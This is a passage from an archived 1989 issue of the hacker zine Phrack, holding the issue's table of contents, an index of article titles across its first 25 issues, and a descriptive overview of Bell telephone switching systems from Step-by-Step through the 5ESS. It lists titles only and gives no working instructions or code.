home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 25.sit / Phrack Issue 25
Text File  |  1993-02-08  |  195KB  |  3,841 lines

  1.  
  2.  
  3.  
  4.                                 ==Phrack Inc.==
  5.  
  6.                      Volume Three, Issue 25, File 1 of 11
  7.  
  8.                     Phrack Inc. Newsletter Issue XXV Index
  9.                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10.                                 March 29, 1989
  11.  
  12.      Welcome to Phrack Inc. Issue 25 -- The beginning of Volume Three of the
  13. Phrack Inc. Newsletter.  We have been around since November 17, 1985 and we're
  14. proud to be still going strong.
  15.  
  16.      In this issue, we feature two really decent articles that deal with Unix
  17. and a special index file that chronicles all 25 issues of Phrack Inc. to date.
  18. Special thanks for help in the compilation of this file goes to Prime Suspect,
  19. Red Knight, and Hatchet Molly.  Also, more details concerning SummerCon '89
  20. appear in Phrack World News XXV and again, further information will be released
  21. as it develops.  We hope you enjoy it!
  22.  
  23.      As always, we ask that anyone with network access drop us a line to either
  24. our Bitnet accounts or our Internet addresses...
  25.  
  26.                Taran King                        Knight Lightning
  27.           C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
  28.        C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
  29. _______________________________________________________________________________
  30.  
  31. Table of Contents:
  32.  
  33. 1.  Phrack Inc. XXV Index by Taran King and Knight Lightning
  34. 2.  25th Anniversary Index by Knight Lightning, Taran King, and other friends
  35. 3.  Bell Network Switching Systems by Taran King
  36. 4.  SPAN:  Space Physics Analysis Network by Knight Lightning
  37. 5.  Unix Cracking Tips by Dark OverLord
  38. 6.  Hiding Out Under Unix by Black Tie Affair
  39. 7.  The Blue Box And Ma Bell by The Noid
  40. 8.  Hacking:  What's Legal And What's Not by Hatchet Molly
  41. 9.  Phrack World News XXV/Part 1 by Knight Lightning
  42. 10. Phrack World News XXV/Part 2 by Knight Lightning
  43. 11. Phrack World News XXV/Part 3 by Knight Lightning
  44.  
  45.                                 ==Phrack Inc.==
  46.  
  47.                      Volume Three, Issue 25, File 2 of 11
  48.  
  49.                             Phrack Inc. Newsletter
  50.                          25th Issue Anniversary Index
  51.  
  52.                    From November 17, 1985 to March 29, 1989
  53.  
  54.                       By Knight Lightning and Taran King
  55.  
  56.                                Special Thanks To
  57.  
  58.                   Hatchet Molly / Prime Suspect / Red Knight
  59.  
  60.  
  61. Phrack 1 (November 17, 1985)
  62.  
  63. 1.  Introduction to Phrack Inc. Issue 1 by Taran King
  64. 2.  SAM Security Article by Spitfire Hacker
  65. 3.  Boot Tracing on Apple by Cheap Shades
  66. 4.  The Fone Phreak's Revenge by Iron Soldier
  67. 5.  MCI International Cards by Knight Lightning
  68. 6.  How to Pick Master Locks by Gin Fizz and Ninja NYC
  69. 7.  How to Make an Acetylene Balloon Bomb by The Clashmaster
  70. 8.  School/College Computer Dial-Ups by Phantom Phreaker
  71.  
  72.  
  73. Phrack 2 (January 5, 1986)
  74.  
  75. 1.  Phrack Inc. Issue 2 Index by Taran King
  76. 2.  Prevention of the Billing Office Blues by Forest Ranger
  77. 3.  Homemade Guns by Man-Tooth
  78. 4.  Blowguns by The Pyro
  79. 5.  TAC Dialups by Phantom Phreaker
  80. 6.  Universal Information Services via ISDN by Taran King
  81. 7.  MCI Overview by Knight Lightning
  82. 8.  Hacking RSTS by Data Line
  83. 9.  Phreak World News by Knight Lightning
  84.  
  85.  
  86. Phrack 3
  87.  
  88. 1.  Phrack Inc. Issue 3 Index by Cheap Shades
  89. 2.  Rolm Systems written by Monty Python
  90. 3.  Making Shell Bombs by Man-Tooth
  91. 4.  Signalling Systems Around the World by Data Line
  92. 5.  Private Audience by Overlord
  93. 6.  4-Tel Systems by Phantom Phreaker
  94. 7.  Eavesdropping by Circle Lord
  95. 8.  Building a Shock Box by Circle Lord
  96. 9.  Introduction to PBX's by Knight Lightning
  97. 10. Phreak World News II by Knight Lightning
  98.  
  99.  
  100. Phrack 4
  101.  
  102. 1.  Pro-Phile I on Crimson Death by Taran King
  103. 2.  Ringback Codes for the 314 NPA (Incomplete) by Data Line
  104. 3.  False Identification by Forest Ranger
  105. 4.  Profile on MAX Long Distance Service by Phantom Phreaker
  106. 5.  Breaching and Clearing Obstacles by Taran King
  107. 6.  Crashing DEC-10's by The Mentor
  108. 7.  Centrex Renaissance by Jester Sluggo
  109. 8.  The Tried and True Home Production Method for Speed by The Leftist
  110. 9.  Phrack World News Issue 3 Part 1 by Knight Lightning
  111. 10. Phrack World News Issue 3 Part 2 by Knight Lightning
  112. 11. Phrack World News Issue 3 Part 3 by Knight Lightning
  113.  
  114.  
  115. Phrack 5
  116.  
  117. 1.  Phrack V Intro by Taran King
  118. 2.  Phrack Pro-Phile of Broadway Hacker by Taran King
  119. 3.  Hacking DEC's by Carrier Culprit
  120. 4.  Hand to Hand Combat by Bad Boy in Black
  121. 5.  DMS-100 by Knight Lightning
  122. 6.  Bolt Bombs by The Leftist
  123. 7.  Wide Area Networks Part 1 by Jester Sluggo
  124. 8.  Radio Hacking by The Seker
  125. 9.  Mobile Telephone Communications by Phantom Phreaker
  126. 10. Phrack World News IV Part 1 by Knight Lightning
  127. 11. Phrack World News IV Part 2 by Knight Lightning
  128. 12. Phrack World News IV Part 3 by Knight Lightning
  129.  
  130.  
  131. Phrack 6
  132.  
  133. 1.  Index by Taran King
  134. 2.  Pro-Phile on Groups by Knight Lightning
  135. 3.  The Technical Revolution by Dr. Crash
  136. 4.  Fun with Lighters by The Leftist
  137. 5.  Nasty Unix Tricks by Shooting Shark
  138. 6.  Smoke Bombs by Alpine Kracker
  139. 7.  Cellular Telephones by High Evolutionary
  140. 8.  Wide Area Networks Part 2 by Jester Sluggo
  141. 9.  Phrack World News Part 1 by Knight Lightning
  142. 10. Phrack World News Part 2 by Knight Lightning
  143. 11. Phrack World News Part 3 by Knight Lightning
  144. 12. Phrack World News Part 4 by Knight Lightning
  145. 13. Phrack World News Part 5 by Knight Lightning
  146.  
  147.  
  148. Phrack 7
  149.  
  150. 1.  Intro/Index by Taran King
  151. 2.  Phrack Pro-Phile of Scan Man by Taran King
  152. 3.  Hacker's Manifesto by The Mentor
  153. 4.  Hacking Chilton's Credimatic by Ryche
  154. 5.  Hacking RSTS Part 1 by The Seker
  155. 6.  How to Make TNT by The Radical Rocker
  156. 7.  Trojan Horses in Unix by Shooting Shark
  157. 8.  Phrack World News VI Part 1 by Knight Lightning
  158. 9.  Phrack World News VI Part 2 by Knight Lightning
  159. 10. Phrack World News VI Part 3 by Knight Lightning
  160.  
  161.  
  162. Phrack 8
  163.  
  164. 1.  Phrack Inc. Index by Taran King
  165. 2.  Phrack Pro-Phile V on Tuc by Taran King
  166. 3.  City-Wide Centrex by The Executioner
  167. 4.  The Integrated Services Digital Network by Dr. Doom
  168. 5.  The Art of Junction Box Modeming by Mad Hacker 616
  169. 6.  Compuserve Info by Morgoth and Lotus
  170. 7.  Fun with Automatic Tellers by The Mentor
  171. 8.  Phrack World News VII Part 1 by Knight Lightning
  172. 9.  Phrack World News VII Part 2 by Knight Lightning
  173.  
  174.  
  175. Phrack 9
  176.  
  177. 1.  Introduction to Phrack Inc. Issue Nine by Taran King
  178. 2.  Phrack Pro-Phile on The Nightstalker by Taran King
  179. 3.  Fun With the Centagram VMS Network by Oryan Quest
  180. 4.  Programming RSTS/E File2:  Editors by Solid State
  181. 5.  Inside Dialog by Ctrl C
  182. 6.  Plant Measurement by The Executioner
  183. 7.  Multi-User Chat Program for DEC-10's by TTY-Man and The Mentor
  184. 8.  Introduction to Videoconferencing by Knight Lightning
  185. 9.  Loop Maintenance Operations System by Phantom Phreaker and Doom Prophet
  186. 10. Phrack World News VIII by Knight Lightning
  187.  
  188.  
  189. Phrack 10
  190.  
  191. 1.  Introduction to Phrack 10 by Taran King
  192. 2.  Pro-Phile on Dave Starr by Taran King
  193. 3.  The TMC Primer by Cap'n Crax
  194. 4.  A Beginner's Guide to the IBM VM/370 by Elric of Imrryr
  195. 5.  Circuit Switched Digital Capability by The Executioner
  196. 6.  Hacking Primos Part I by Evil Jay
  197. 7.  Automatic Number Identification by Phantom Phreaker and Doom Prophet
  198. 8.  Phrack World News IX Part 1 by Knight Lightning
  199. 9.  Phrack World News IX Part 2 by Knight Lightning
  200.  
  201.  
  202. Phrack 11
  203.  
  204. 1.  Index to Phrack 11 by Taran King
  205. 2.  Phrack Pro-Phile VIII on Wizard of Arpanet by Taran King
  206. 3.  PACT:  Prefix Access Code Translator by The Executioner
  207. 4.  Hacking Voice Mail Systems by Black Knight from 713
  208. 5.  Simple Data Encryption or Digital Electronics 101 by The Leftist
  209. 6.  AIS - Automatic Intercept System by Taran King
  210. 7.  Hacking Primos I, I, III by Evil Jay
  211. 8.  Telephone Signalling Methods by Doom Prophet
  212. 9.  Cellular Spoofing By Electronic Serial Numbers donated by Amadeus
  213. 10. Busy Line Verification by Phantom Phreaker
  214. 11. Phrack World News X by Knight Lightning
  215. 12. Phrack World News XI by Knight Lightning
  216.  
  217.  
  218. Phrack 12
  219.  
  220. 1.  Index of Phrack 12 by Taran King
  221. 2.  Pro-Phile IX on Agrajag The Prolonged by Taran King
  222. 3.  Preview to Phrack 13-The Life & Times of The Executioner
  223. 4.  Understanding the Digital Multiplexing System (DMS) by Control C
  224. 5.  The Total Network Data System by Doom Prophet
  225. 6.  CSDC II - Hardware Requirements by The Executioner
  226. 7.  Hacking:  OSL Systems by Evil Jay
  227. 8.  Busy Line Verification Part II by Phantom Phreaker
  228. 9.  Scan Man's Rebuttal to Phrack World News
  229. 10. Phrack World News XII Part 1 by Knight Lightning
  230. 11. Phrack World News XII Part 2 by Knight Lightning
  231.  
  232.  
  233. Phrack 13 (April 1, 1987)
  234.  
  235. 1.  Phrack 13 Index by Taran King
  236. 2.  Real Phreaker's Guide Vol. 2 by Taran King and Knight Lightning
  237. 3.  How to Fuck Up the World - A Parody by Thomas Covenant
  238. 4.  How to Build a Paisley Box by Thomas Covenant and Double Helix
  239. 5.  Phreaks In Verse by Sir Francis Drake
  240. 6.  R.A.G. - Rodents Are Gay by Evil Jay
  241. 7.  Are You A Phone Geek?  by Doom Prophet
  242. 8.  Computerists Underground News Tabloid - CUNT by Crimson Death
  243. 9.  RAGS - The Best of Sexy Exy
  244. 10. Phrack World News XIII by Knight Lightning
  245.  
  246.  
  247.  
  248. Phrack 14
  249.  
  250. 1.  Phrack 14 Index by Knight Lightning
  251. 2.  Phrack Pro-Phile X on Terminus by Taran King
  252. 3.  The Conscience of a Hacker (Reprint) by The Mentor
  253. 4.  REMOBS:  The Reality of The Myth by Taran King
  254. 5.  Understanding DMS Part II by Control C
  255. 6.  TRW Business Terminology by Control C
  256. 7.  Phrack World News Special Edition 1 by Knight Lightning
  257. 8.  Phrack World News Issue XIV Part 1 by Knight Lightning
  258. 9.  Phrack World News Issue XIV Part 2 by Knight Lightning
  259.  
  260.  
  261. Phrack 15
  262.  
  263. 1.  Phrack XV Intro by Shooting Shark
  264. 2.  More Stupid Unix Tricks by Shooting Shark
  265. 3.  Making Free Local Payfone Calls by Killer Smurf
  266. 4.  Advanced Carding XIV by The Disk Jockey
  267. 5.  Gelled Flame Fuels by Elric of Imrryr
  268. 6.  Phrack World News XV/Part 1 by Knight Lightning
  269. 7.  Phrack World News XV/Part 2 by Knight Lightning
  270. 8.  Phrack World News XV/Part 3 by Sir Francis Drake
  271.  
  272.  
  273. Phrack 16
  274.  
  275. 1.  Phrack 16 Intro by Elric of Imrryr
  276. 2.  BELLCORE Information by The Mad Phone-Man
  277. 3.  A Hacker's Guide to Primos:  Part 1 by Cosmos Kid
  278. 4.  Hacking GTN by The Kurgan
  279. 5.  Credit Card Laws Laws by Tom Brokow
  280. 6.  Tapping Telephone Lines by Agent Steal
  281. 7.  Reading Trans-Union Credit Reports by The Disk Jockey
  282. 8.  Phrack World News XXVI/Part 1 by Shooting Shark
  283. 9.  Phrack World News XXVI/Part 2 by The Mad Phone-Man
  284. 10. Phrack World News XXVI/Part 3 by The Mad Phone-Man
  285. 11. Phrack World News XXVI/Part 4 by Shooting Shark
  286. 12. Phrack World News XXVI/Part 5 by The $muggler
  287.  
  288.  
  289. Phrack 17 (April 7, 1988)
  290.  
  291. 1.  Phrack XVII Introduction by Shooting Shark
  292. 2.  Dun & Bradstreet Report on AT&T by Elric of Imrryr
  293. 3.  Dun & Bradstreet Report on Pacific Telesis by Elric of Imrryr
  294. 4.  Nitrogen-Trioxide Explosive by Signal Substain
  295. 5.  How to Hack Cyber Systems by Grey Sorcerer
  296. 6.  How to Hack HP2000's by Grey Sorcerer
  297. 7.  Accessing Government Computers by The Sorceress
  298. 8.  Dial-Back Modem Security by Elric of Imrryr
  299. 9.  Data Tapping Made Easy by Elric of Imrryr
  300. 10. Phrack World News XVII/Part 1 by Sir Francis Drake
  301. 11. Phrack World News XVII/Part 2 by The $muggler
  302. 12. Phrack World News XVII/Part 3 by The Sorceress
  303.  
  304.  
  305. Phrack 18 (June 7, 1988)
  306.  
  307. 1.  Index of Phrack 18 by Crinsom Death
  308. 2.  Pro-Phile XI on Ax Murderer by Crimson Death
  309. 3.  An Introduction to Packet Switched Netwoks by Epsilon
  310. 4.  Primos: Primenet, RJE, DPTX by Magic Hasan
  311. 5.  Hacking CDC's Cyber by Phrozen Ghost
  312. 6.  Unix for the Moderate by URvile
  313. 7.  Unix System Security Issues by Jester Sluggo
  314. 8.  Loop Maintenance Operating System by Control C
  315. 9.  A Few Thinigs About Networks by Prime Suspect
  316. 10. Phrack World News XVIII Part I by Epsilon
  317. 11. Phrack World News XVIII Part II by Epsilon
  318.  
  319.  
  320. Phrack 19
  321.  
  322. 1.  Phrack Inc. Index by Crimson Death
  323. 2.  DCL Utilities for VMS Hackers by The Mentor
  324. 3.  Digital Multiplexing Systems (Part 2) by Control C
  325. 4.  Social Security Number Formatting by Shooting Shark
  326. 5.  Facility Assignment & Control Systems by Phantom Phreaker
  327. 6.  Phrack Editorial on Microbashing by The Nightstalker
  328. 7.  Phrack World News XVIV/Part 1 by Knight Lightning
  329. 8.  Phrack World News XVIV/Part 2 by Epsilon
  330.  
  331.  
  332. Phrack 20 (October 12, 1988)
  333.  
  334. 1.  Phrack XX Index by Taran King and Knight Lightning
  335. 2.  Phrack Pro-Phile on Taran King
  336. 3.  Timeline Featuring Taran King, Knight Lightning, and Cheap Shades
  337. 4.  Welcome To Metal Shop Private by TK, KL, and CS
  338. 5.  Metal/General Discussion
  339. 6.  Phrack Inc./Gossip
  340. 7.  Phreak/Hack Sub
  341. 8.  Social Engineering
  342. 9.  New Users
  343. 10. The Royal Court
  344. 11. Acronyms
  345. 12. Phrack World News XX Featuring SummerCon '88 by Knight Lightning
  346.  
  347.  
  348. Phrack 21 (November 4, 1988)
  349.  
  350. 1.  Index by Taran King and Knight Lightning
  351. 2.  Phrack Pro-Phile on Modem Master by Taran King
  352. 3.  Shadows Of A Future Past (Part 1 of the Vicious Circle Trilogy) by KL
  353. 4.  The Tele-Pages by Jester Sluggo
  354. 5.  Satellite Communications by Scott Holiday
  355. 6.  Network Management Center by Knight Lightning and Taran King
  356. 7.  Non-Published Numbers by Patrick Townsend
  357. 8.  Blocking Of Long Distance Calls by Jim Schmickley
  358. 9.  Phrack World News Special Edition II by Hatchet Molly and Knight Lightning
  359. 10. Phrack World News Issue XXI Part 1 by Knight Lightning and Epsilon
  360. 11. Phrack World News Issue XXI Part 2 by Knight Lightning and Epsilon
  361.  
  362.  
  363. Phrack 22 (December 23, 1988)
  364.  
  365. 1.  Index by Taran King and Knight Lightning
  366. 2.  Phrack Pro-Phile on Karl Marx by Taran King & Knight Lightning
  367. 3.  The Judas Contract (Part 2 of the Vicious Circle Trilogy) by KL
  368. 4.  A Novice's Guide To Hacking (1989 Edition) by The Mentor
  369. 5.  An Indepth Guide In Hacking Unix by Red Knight
  370. 6.  Yet Another File On Hacking Unix by >Unknown User<
  371. 7.  Computer Hackers Follow A Guttman-Like Progression by Richard C. Hollinger
  372. 8.  A Report On The InterNet Worm by Bob Page
  373. 9.  Phrack World News Issue XXII/Part 1 by Knight Lightning and Taran King
  374. 10. Phrack World News Issue XXII/Part 2 by Knight Lightning and Taran King
  375. 11. Phrack World News Issue XXII/Part 3 by Knight Lightning and Taran King
  376. 12. Phrack World News Issue XXII/Part 4 by Knight Lightning and Taran King
  377.  
  378.  
  379. Phrack 23 (January 28, 1989)
  380.  
  381. 1.  Phrack Inc. XXIII Index by Knight Lightning & Taran King
  382. 2.  Phrack Prophile XXIII Featuring The Mentor by Taran King
  383. 3.  Subdivisions (Part 3 of The Vicious Circle Trilogy) by Knight Lightning
  384. 4.  Utopia; Chapter One of FTSaga by Knight Lightning
  385. 5.  Foundations On The Horizon; Chapter Two of FTSaga by Knight Lightning
  386. 6.  Future Transcendent Saga Index A from the Bitnet Services Library
  387. 7.  Future Transcendent Saga Index B from the Bitnet Services Library
  388. 8.  Getting Serious About VMS Hacking by VAXBusters International
  389. 9.  Can You Find Out If Your Telephone Is Tapped? by Fred P. Graham (& VaxCat)
  390. 10. Big Brother Online by Thumpr (Special Thanks to Hatchet Molly)
  391. 11. Phrack World News XXIII/Part 1 By Knight Lightning
  392. 12. Phrack World News XXIII/Part 2 by Knight Lightning
  393.  
  394.  
  395. Phrack 24 (February 25, 1989)
  396.  
  397. 1.  Phrack Inc. XXIV Index by Taran King and Knight Lightning
  398. 2.  Phrack Prophile XXIV Featuring Chanda Leir by Taran King
  399. 3.  Limbo To Infinty; Chapter Three of FTSaga by Knight Lightning
  400. 4.  Frontiers; Chapter Four of FTSaga by Knight Lightning
  401. 5.  Control Office Administration Of Enhanced 911 Service by The Eavesdropper
  402. 6.  Glossary Terminology For Enhanced 911 Service by The Eavesdropper
  403. 7.  Advanced Bitnet Procedures by VAXBusters International
  404. 8.  Special Area Codes by >Unknown User<
  405. 9.  Lifting Ma Bell's Cloak Of Secrecy by VaxCat
  406. 10. Network Progression by Dedicated Link
  407. 11. Phrack World News XXIV/Part 1 by Knight Lightning
  408. 12. Phrack World News XXIV/Part 2 by Knight Lightning
  409. 13. Phrack World News XXIV/Part 3 by Knight Lightning
  410.  
  411.  
  412. Phrack 25 (March 29, 1989)
  413.  
  414. 1.  Phrack Inc. XXV Index by Taran King and Knight Lightning
  415. 2.  25th Anniversary Index by Knight Lightning, Taran King, and other friends
  416. 3.  Bell Network Switching Systems by Taran King
  417. 4.  SPAN:  Space Physics Analysis Network by Knight Lightning
  418. 5.  Unix Cracking Tips by Dark OverLord
  419. 6.  Hiding Out Under Unix by Black Tie Affair
  420. 7.  The Blue Box And Ma Bell by The Noid
  421. 8.  Hacking:  What's Legal And What's Not by Hatchet Molly
  422. 9.  Phrack World News XXV/Part 1 by Knight Lightning
  423. 10. Phrack World News XXV/Part 2 by Knight Lightning
  424. 11. Phrack World News XXV/Part 3 by Knight Lightning
  425. _______________________________________________________________________________
  426.  
  427.                                 ==Phrack Inc.==
  428.  
  429.                      Volume Three, Issue 25, File 3 of 11
  430.  
  431.                         Bell Network Switching Systems
  432.  
  433.                        An Informational Definitive File
  434.  
  435.                                  By Taran King
  436.  
  437.                                 March 14, 1989
  438.  
  439.  
  440.          Throughout my many conversations with what many consider the "elite"
  441. of the community, I have come to realize that even the highest up on the
  442. hierarchical map do not know all of the little differences and specificities of
  443. the switching systems that the BOCs use throughout the nation.  This file was
  444. written so that people could understand the differences between their switch
  445. and those switches in areas where they have friends or that they pass through.
  446.  
  447.          There are two broad categories that switches can be separated into:
  448. local and tandem.  Local offices connect customer lines to each other for
  449. local calls and connect lines to trunks for interoffice calls.  Tandem
  450. switching is subdivided into two categories:  local tandem offices and toll
  451. offices.  Local toll offices connect trunks to trunks within a metropolitan
  452. area whereas toll offices connect trunks to trunks from the toll network
  453. portion (class 1 to 4) of the hierarchical Public Switched Telephone Network
  454. (PSTN).
  455.  
  456.          Because of the convenience of having direct interface with customer
  457. lines, local switching has built in functions needed to provide exchange
  458. services such as local calling, custom calling features, Touch-Tone service,
  459. E911 service, and exchange business services (like Centrex, ESSX-1, and
  460. ESS-ACD.  Centrex is a service for customers with many stations that is
  461. provided out of the Central Office.  ESSX-1 service limits the number of
  462. simultaneous incoming and outgoing calls and the number of simultaneous
  463. intragroup calls to software sizes specified by the customer.  ESS-ACD is the
  464. exchange service equivalent to Automatic Call Distribution except the call
  465. distribution takes place in a Centrex-functioning portion of the electronic
  466. switch.)
  467.  
  468.          Geographic centralization of the tandem office allows efficiency in
  469. providing centralized billing and network services.
  470.  
  471.          Automatic switching was formally installed by the Bell System in 1919
  472. and although there are many replacements that update old and less preferable
  473. services, many older offices still exist in various parts of the country.
  474.  
  475.  
  476. ELECTROMECHANICAL SWITCHING SYSTEMS
  477.  
  478.          The Step By Step (SXS) switching system, also known as the Strowger
  479. system, was the earliest switching system.  Invented by A. B. Strowger in
  480. 1889, it is currently used in rural and suburban areas around the country as
  481. well as some metropolitan areas which were small when the switch was
  482. installed.  The term "Step By Step" describes both the manner in which the
  483. switching network path is established and the way in which each of the
  484. switches in the path operates.  They combine vertical stepping and a
  485. horizontal rotary stepping motion to find the number dialed through pulse.
  486. The drawbacks of the SXS system include not being able to have Touch Tone
  487. calling or alternative routing without adding expensive equipment to the
  488. office and also that the customer's telephone number is determined by the
  489. physical termination/location of the line or connector on the system.  The
  490. line cannot be moved without changing the telephone number.  The other
  491. drawback is the high maintenance cost.  These reasons, among others, have led
  492. to a drop in the amount of SXS systems seen around the country.
  493.  
  494.          The No. 1 Crossbar (XBAR) was developed for use in metropolitan
  495. areas.  The XBAR system uses horizontal and vertical bars to select the
  496. contacts.  There are five selecting bars mounted horizontally across the front
  497. of each XBAR switch.  Each selecting bar can choose either of two horizontal
  498. rows of contacts.  The five horizontal selecting bars can therefore select ten
  499. horizontal rows of contacts.  There are ten or twenty vertical units mounted
  500. on the switch and each vertical unit forms one vertical path.  Each switch has
  501. either 100 or 200 sets of crosspoints/contacts depending on the number of
  502. vertical units.
  503.  
  504.          The No. 5 Crossbar was developed to fill the need for a switching
  505. system that would be more productive in suburban residential areas or smaller
  506. cities.  The No. 5 XBAR also included automatic recording of call details for
  507. billing purposes to allow for DDD (Direct Distance Dialing).  The No. 5 XBAR
  508. is separated into 2 parts:  the switching network where all the talking paths
  509. are established and the common-control equipment which sets up the talking
  510. paths.  Various improvements have been made on the No. 5 XBAR over the years
  511. such as centralized automatic message accounting, line link pulsing to
  512. facilitate DID (Direct Inward Dialing) to stations served by a dial PBX
  513. (Private Branch Exchange), international DDD, Centrex service, and ACD
  514. capability.  The No. 5 Electronic Translator System (ETS) was also a
  515. development which used software instead of wire cross-connections to provide
  516. line, trunk, and routing translations as well as storing billing information
  517. for transmissions via data link to a centralized billing collection system.
  518.  
  519.          The No. 4 Crossbar is a common-control system designed for toll
  520. service with crossbar switches making up its switching network.  The No. 4A
  521. XBAR system was designed for metropolitan areas and added the ability to have
  522. CAMA (Centralized Automatic Message Accounting) as well as foreign-area
  523. translation, automatic alternate routing, and address digit manipulation
  524. capabilities (which is converting the incoming address to a different address
  525. for route control in subsequent offices, deleting digits, and prefixing new
  526. digits if needed).  The No. 4A ETS replaced the card translator (which was
  527. used for translation via phototransistors) and allowed billing and route
  528. translation functions to be changed by teletypewriter input as it was a
  529. stored-program control processor.  CCIS (Common Channel Interoffice
  530. Signaling) was added to the No. 4A XBAR in 1976 for more efficient signaling
  531. between toll offices among other things.
  532.  
  533.  
  534. ELECTRONIC SWITCHING SYSTEMS
  535.  
  536.          The Electronic Switching Systems were made possible by the invention
  537. of the transistor.  They apply the basic concepts of an electronic data
  538. processor, operating under the direction of a stored-program control, and
  539. high-speed switching networks.  The stored-program control allows system
  540. designs the necessary flexibility to design new features and install them
  541. easily.  The SPC controls the sequencing of operations required to establish a
  542. call.  It can control a line or trunk circuit according to its application.
  543.  
  544.          The first electronic switching trial took place in Morris, IL in
  545. 1960.  The first application of electronic local switching in the Bell System
  546. took place in May of 1965 with the cutover of the first 1ESS switch in
  547. Succasunna, NJ.
  548.  
  549.          The 1ESS switching system was designed for areas where large numbers
  550. of lines and lines with heavy traffic are served.  It generally serves between
  551. 10,000 and 65,000 lines.  The memory of the 1ESS is generally read only memory
  552. (ROM) so that neither software or hardware malfunctions can alter the
  553. information content.
  554.  
  555.          The 1A Processor was introduced in 1976 in the first 1AESS switch.
  556. It was designed for local switching applications to be implemented into a
  557. working 1ESS switch.  It allowed the switching capacity to be doubled from
  558. the old 1ESS switches also.  The 1A Processor uses both ROM and RAM (Random
  559. Access Memory).  Magnetic tape units in the 1A Processor allow for system
  560. reinitialization as well as detailed call billing functions.
  561.  
  562.          Both the 1ESS and the 1AESS switches use the same peripheral
  563. equipment which allows for easy transition.  Programs in both switches control
  564. routine tests, diagnose troubles, detect and report faults and troubles, and
  565. control emergency actions to ensure satisfactory operation.  Both switches
  566. offer the standard custom calling features as well as business features like
  567. Centrex, ESS-ACD, Enhanced Private Switched Communications Service or ETS
  568. (Electronic Tandem Switching).
  569.  
  570.          The 2ESS was designed to extend electronic switching into suburban
  571. regions but doing so economically, meeting the need for 2,000 to 10,000 line
  572. offices.  It has a call capacity of 19,000 with a maximum of 24,000 terminals
  573. per system.  One of the differences between the 1ESS and the 2ESS is that in
  574. the 2ESS, lines and trunks terminate on the same side of the network, which is
  575. called a folded network.  There is no need for separate line and trunk link
  576. networks as in the 1ESS.  Also, the network architecture was designed to
  577. interface with customer lines carrying lighter traffic, the features were
  578. oriented toward residential rather than business lines, and the processor was
  579. smaller and less expensive.
  580.  
  581.          In 1976, the first 2BESS switch was introduced in Acworth, GA.  The
  582. 2BESS switch is similar to the 1AESS in that it has something added into the
  583. switch.  In this case, though, it is the 3ACC (3A Central Control), which is
  584. in the place of the processor.  The 3ACC doubles the call capacity originally
  585. available in the 2ESS switch by combining integrated circuit design with
  586. semiconductor memory stores.  It also requires one-fifth of the floor space
  587. and one-sixth of the power and air conditioning that the 2ESS central
  588. processor requires.  The 3ACC is a self-checking, microprogram-controlled
  589. processor capable of high-speed serial communication.  Resident programs in
  590. the 3ACC are hardware write-protected, but non-resident programs like
  591. maintenance, recent change (RC), and back-up for translations or residential
  592. programs are stored on a tape cartridge.
  593.  
  594.          Also in 1976, the need for switching in rural areas serving fewer
  595. than 4500 lines resulted in the introduction of the 3ESS switch.  The 3ESS
  596. switching equipment is the smallest Western Electric space-division,
  597. centralized electronic switching system which serves 2,000 to 4,500 lines.
  598. The 3ACC is used as the processor in the 3ESS, which was designed to meet the
  599. needs of a typical Community Dial Office (CDO).  It, too, is a folded network
  600. like the 2ESS and 2BESS.  The switch was designed for unattended operation,
  601. implementing extensive maintenance programs as well as remote SCCS (Switching
  602. Control Center System) maintenance capabilities.
  603.  
  604.          The 4ESS switching equipment is a large-capacity tandem system for
  605. trunk-to-trunk interconnection.  It forms the heart of the Stored-Program
  606. Control (SPC) network that uses CCIS (Common-Channel Interoffice Signaling)
  607. yet still supports Multi-Frequency (MF) and Dial-Pulse (DP) signaling.  The
  608. SPC network allows for features such as the Mass Announcement System (MAS)
  609. (which is where we find all of our entertaining 900 Dial-It numbers) and
  610. WATS (Wide-Area Telecommunications Services) screening/routing.  The 4ESS also
  611. provides international gateway functions.  It uses a 1A Processor as its main
  612. processor, which, along with its use of core memories and higher speed logic,
  613. is about five times as fast as the 1ESS processor.  The 4ESS software
  614. structure is based on a centralized development process using three languages:
  615. a low-level assembly language, the intermediate language called EPL (ESS
  616. Programming Language), and a high level language called EPLX.  The assembly
  617. language takes care of real-time functions like call processing while
  618. measurements and administrative functions frequently are programmed in EPL.
  619. Some maintenance programs and audits which are not as frequently run are in
  620. EPLX.  Up to six 4ESS switches can be remotely administered and maintained
  621. from centralized work centers which means that very few functions need to be
  622. performed at the site of the switch itself.
  623.  
  624.          In March of 1982, the 5ESS switch first went into operation.  It is a
  625. digital time-division electronic switching system designed for modular growth
  626. to accommodate local offices ranging from 1,000 to 100,000 lines.  It was
  627. designed to replace remaining electromechanical switching systems in rural,
  628. suburban, and urban areas economically.  Features of new generic versions of
  629. the program allowed multimodule configuration and local/toll features for
  630. combined class 4 and class 5 operation.  The 5ESS administrative module
  631. processor consists of two 3B20s.  The communications module consists of a
  632. message switch and a TMS (Time-Multiplexed Switch), which is used to connect
  633. voice channels in one interface module to voice channels in another interface
  634. module as well as for data messages between the administrative modules and
  635. interface modules and also is used for data messages between interface
  636. modules.  The interface module can host analog line/trunk units, digital
  637. line/trunk units, digital carrier line units, digital service circuit units,
  638. or metallic service units in addition to miscellaneous test and access units.
  639. There are 2 software divisions in the 5ESS.  The portion in the administrative
  640. module processor is responsible for officewide functions such as the human
  641. interfaces, routing, charging, feature translations, switch maintenance, and
  642. data storage and backup.  The portion in the interface module is responsible
  643. for the standard call-processing functions associated with the lines and
  644. trunks terminating on that interface module.  Most software is written in C
  645. and has a modular structure to afford easy expansion and maintenance.
  646.  
  647.          The last thing to mention here are Remote Switching Systems (RSS) and
  648. Remote Switching Modules (RSM).  The No. 10A RSS is designed to act as an
  649. extension of a 1ESS, 1AESS, or 2BESS switching equipment host and is
  650. controlled remotely by the host over a pair of dedicated data links.  It
  651. shares the processor capabilities of these nearby ESS switches and uses a
  652. microprocessor for certain control functions under the direction of the host
  653. central processor.  The RSS is capable of stand-alone functioning if the links
  654. between it and the host are severed somehow.  If this occurs, though, custom
  655. calling, billing, traffic measurements, etc. are unavailable -- only basic
  656. service on intra-RSS calls is allowed.  The No. 5A RSM can be located up to
  657. 100 miles from the 5ESS host and can terminate a maximum of 4000 lines with a
